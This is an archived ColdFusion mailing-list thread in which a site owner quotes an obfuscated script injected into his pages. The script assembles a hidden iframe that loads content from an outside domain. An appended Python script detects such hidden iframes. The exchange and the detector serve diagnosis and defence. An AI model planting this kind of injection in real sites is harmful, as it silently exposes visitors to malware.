Thank you guys. I guess I searched everywhere but House of Fusion. I shoulda known.
Terry

-----Original Message-----
From: Terry Troxel [mailto:[email protected]]
Sent: Wednesday, April 15, 2009 7:13 PM
To: cf-talk
Subject: [SPAM-HIGH] OT Malware on a CF Site

Has anyone seen anything like this written to any of your sites?

<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";
var applstrna2 = ".com/bb/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>

The file this was written to is an index.cfm file that has been on the site for over 8 years. The only line that was in this file was a cflocation to redirect to another folder. The index.html file that this file redirects to is rewritten by CF every time the site admin makes a change. THAT index.html file had the same script written to the very bottom of that file as well, but when I made a change and it was rewritten the script is gone. I can then assume something other than my CF or any SQL injections are not the culprit.

I have been unable to contact the hosting company to check their server and I have also been unable to find anything in my Googling to give me any clues as to a cause and a cure.

Any help would be greatly appreciated.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321641
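A defender-side check for the pattern quoted in the message above, added here as an example and not part of the original thread: it reassembles strings that a page builds from `var` fragments and passes to `document.write()`, then reports any zero-size iframe, which a plain search for `<iframe` in the file would miss. The function names and regexes are assumptions of this sketch and only cover this concatenation style; `SAMPLE` is the script from the post and `CLEAN` is a constructed benign page.

```python
import re

# String-variable assignments such as: var applstrna0 = "<if";
ASSIGN = re.compile(r'var\s+(\w+)\s*=\s*"([^"]*)"\s*;')
# document.write(a+b+c) whose argument is only identifiers joined by '+'
WRITE = re.compile(r'document\.write\(\s*([\w\s+]+?)\s*\)')
# An opening iframe tag with a zero width or height (invisible to the visitor)
HIDDEN_IFRAME = re.compile(r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0\b', re.I)
SRC = re.compile(r'\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.I)

def reassemble(text):
    """Return the strings that fragment-concatenating document.write() calls emit."""
    values = dict(ASSIGN.findall(text))
    out = []
    for m in WRITE.finditer(text):
        names = [n.strip() for n in m.group(1).split('+')]
        if all(n in values for n in names):
            out.append(''.join(values[n] for n in names))
    return out

def find_hidden_iframes(text):
    """Return src URLs of zero-size iframes, literal or built via document.write."""
    hits = []
    for candidate in [text] + reassemble(text):
        for m in HIDDEN_IFRAME.finditer(candidate):
            end = candidate.find('>', m.end())          # end of the opening tag
            tag = candidate[m.start():end if end != -1 else None]
            src = SRC.search(tag)
            hits.append(src.group(1) if src else '(no src)')
    return hits

# The injected script as quoted in the post
SAMPLE = '''<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://said7";
var applstrna2 = ".com/bb/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>'''

# Constructed benign page: a redirect plus a visible iframe
CLEAN = '<cflocation url="news/index.html"><iframe src="/map.html" width="400" height="300"></iframe>'

if __name__ == '__main__':
    print(find_hidden_iframes(SAMPLE), find_hidden_iframes(CLEAN))
```

Run `find_hidden_iframes()` over the contents of every `.cfm`, `.htm` and `.html` file under the web root to find other files that received the same append, then compare their modification times against FTP and web server logs.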

